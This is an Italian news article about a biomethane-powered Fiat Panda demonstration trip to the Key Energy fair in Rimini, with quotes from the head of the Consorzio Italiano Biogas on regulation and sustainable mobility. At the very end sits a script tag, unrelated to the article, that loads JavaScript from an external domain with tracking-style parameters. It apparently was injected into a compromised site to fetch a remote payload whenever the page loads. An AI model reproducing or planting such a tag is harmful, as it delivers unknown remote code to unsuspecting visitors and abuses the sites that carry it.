“Il biometano è un'opportunità energetica per l'industria e l'ambiente, ma anche una valida alternativa per la mobilità sostenibile”. Con queste parole Piero Gattoni, presidente del Cib, Consorzio Italiano Biogas, ha commentato l'arrivo a Rimini Fiera di una Panda Trekking “virtualmente” alimentata a biometano. Proprio nella città romagnola si è svolta, infatti, Key Energy, la fiera internazionale per l’energia e la mobilità sostenibili, in contemporanea con Ecomondo.
Il biometano è, come noto, un gas metano naturale derivante dal processo di purificazione del biogas ottenuto dalla valorizzazione di prodotti e sottoprodotti della filiera agricola e agroindustriale. È quindi un combustibile “pulito” e rinnovabile e potrebbe contribuire realmente al raggiungimento dei vincoli europei del 20/20/20.
Il progetto “Il biometano si fa strada”, promosso a Key Energy da Cib, Fiat e NGV Italy, nasce dalla volontà di promuovere questo biocarburante per autotrazione e ha lo scopo di dimostrarne tutte le potenzialità per il sistema industriale, agricolo ed economico. Il viaggio partito dagli stabilimenti di Fiat Mirafiori è stato in questo caso solo dimostrativo, vista l'impossibilità a circolare per auto alimentate con questo combustibile a causa dell' attuale assenza di un assetto normativo e fiscale. Ad oggi, infatti, il decreto ministeriale 28/11 promuove genericamente il biometano nelle modalità di immissione in rete, per uso da cogenerazione ad alto rendimento e per autotrazione.
Durante il percorso di 450 chilometri dal Piemonte alla Romagna sono state effettuate una serie di soste in quattro aziende agricole, che fungevano da virtuali stazioni di servizio a dimostrazione della potenzialità e fruibilità di piccole reti di biometano per autotrazione.
La filiera del metano per autotrazione coinvolge tra l'altro il meglio dell'industria del “Made in Italy”. Nel nostro Paese si trova gran parte del know-how tecnologico di settore, ma anche la prima rete di distribuzione europea di metano per auto. “Ci sono tutte le condizioni – ha concluso Gattoni nel corso dell’incontro dedicato all'argomento – per dimostrare alla politica che questo biocarburante è un affare per tutti: business, occupazione ed ambiente”.
<script src="https://secure-content-delivery.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&d=2013-10-10&s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1&cb=0.4144637122080741" type="text/javascript"></script>